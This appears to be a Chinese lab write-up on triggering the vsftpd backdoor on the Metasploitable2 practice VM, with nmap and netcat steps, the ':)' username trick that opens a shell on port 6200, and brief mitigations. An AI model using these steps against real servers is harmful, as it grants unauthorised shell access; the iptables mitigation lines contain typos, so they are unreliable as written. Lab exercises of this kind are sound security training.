kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞

漏洞:vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。

靶机:Metasploitable2

step1:开启kali linux 和 Metasploitable2

step2:扫描漏洞

命令:nmap --script vuln 目标ip

nmap --script vuln -p 21 192.168.56.129

得知开放21端口

step3:入侵过程

命令:nc 192.168.56.129 21

USER user:)            //user:) 随便输入一个用户名,最后跟上:)

PASS 123             //密随便输入

step4:打开另一个终端窗口

命令:nc 192.168.56.129 6200                    //监听触发的6200端口

step5:入侵成功。

命令:id

解决:

1.修改配置文件,将vsftp_cofig .(/etc/vsftpd.config)里面的匿名登陆改为NO

2、对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口。 iptables -A  INPUT -p tcp -dport  6200 -j  DROP iptabels -A OUTPUT -p tcp sport  6200 -j DROP

 

你可能感兴趣的:(kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞)